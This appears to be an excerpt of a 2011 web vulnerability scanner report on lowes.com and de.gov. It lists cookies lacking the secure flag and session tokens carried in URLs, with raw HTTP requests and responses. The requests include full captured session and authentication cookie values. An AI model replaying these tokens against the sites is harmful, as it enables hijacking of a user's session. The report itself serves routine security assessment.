Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jun 2011 11:20:33 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 60109
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/*
* common.js
* Common javascript to be run on every page of the Lowes.com web site.
*
* Copyright Lowes, Inc.
*
* Last Modified On 03/04/2010
* Modified By R. Adams
*/

var lowes=
...[SNIP]...

3.9. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jul 2009 13:05:12 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 154101
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

3.10. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 15 Oct 2010 17:00:00 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 72756
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

3.11. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 11 Nov 2010 21:24:51 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 11
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/* empty */

3.12. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 28 Apr 2009 19:56:32 GMT
ETag: "1f8e59-22f6-dc02bc00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 8950
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it u
...[SNIP]...

3.13. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /webapp/wcs/stores/servlet/LogonForm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63497
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 02:33:05 GMT
Set-Cookie: TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; Path=/
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...

4. Session token in URL  previous  next
There are 5 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://de.gov/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://de.gov
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: de.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:55:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 145159

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<meta name="verify-v1" content="thP3VfXQ653dVrb9ExI9XqvyNnfVO9/R4FszK
...[SNIP]...
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Division of Corporations</a></strong> - M-F: 8:30 to 4:00 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a><br>
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Division of Revenue</a></strong> - M-F: 8:30 to 4:00 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a><br>
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">General Questions &amp; Help</a></strong> - M-F: 8:30 to 4:30 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a>
...[SNIP]...

4.2. http://server.iad.liveperson.net/hc/33511087/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://server.iad.liveperson.net
Path:   /hc/33511087/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=startPage&page=http%3A//www.delaware.gov/topics/yourgovernment&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=9159955777&scriptVersion=1.1&d=1310522478911&&amp;SESSIONVAR!skill=Portal_Topics&amp;PAGEVAR!skill=Portal_Topics&scriptType=SERVERBASED&title=Delaware.gov%20--%20Your%20Government&referrer= HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.delaware.gov/topics/yourgovernment
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5099524182751471388; LivePersonID=-16101514677756-1310522366:-1:-1:-1:-1; HumanClickSiteContainerID_33511087=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1310522476608

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:01:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_33511087=STANDALONE; path=/hc/33511087
